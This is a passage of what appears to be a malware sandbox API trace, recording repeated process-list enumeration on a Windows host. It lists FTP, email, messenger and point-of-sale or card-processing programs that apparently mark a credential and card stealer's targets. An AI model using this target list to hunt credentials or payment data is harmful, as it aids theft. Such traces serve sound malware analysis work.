szExeFile="disease_victim_can.exe")) returned 1 [0236.487] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0236.489] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0236.492] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0236.494] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0236.499] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0236.502] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0236.505] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0236.508] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0236.511] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0236.514] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0236.517] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0236.523] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0236.526] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0236.537] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0236.540] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0236.543] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0236.546] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0236.549] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0236.553] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0236.556] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0236.558] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0236.561] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0236.565] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0236.568] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0236.573] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0236.576] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0236.579] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0236.581] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0236.585] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0236.587] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0236.590] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0236.592] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0236.595] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0236.598] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0236.601] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0236.603] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0236.606] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0236.614] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0236.616] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0236.619] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0236.622] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0236.624] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0236.627] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0236.629] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0236.632] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0236.634] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0236.637] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0236.642] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0236.644] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0236.647] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0236.649] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0236.653] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0236.656] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0236.658] CloseHandle (hObject=0x2280) returned 1 [0236.658] Sleep (dwMilliseconds=0x64) [0236.765] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2278 [0236.783] Process32First (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0236.785] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0236.788] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0236.790] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0236.792] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0236.795] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0236.797] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0236.799] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0236.802] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0236.847] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.850] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.852] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0236.855] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.858] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.860] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.862] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.865] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.868] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.871] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.872] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0236.874] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0236.877] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0236.879] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0236.921] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.923] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0236.926] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0236.928] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0236.930] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0236.932] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0236.934] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0236.935] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.937] Process32Next (in: hSnapshot=0x2278, lppe=0x102efe20 | out: 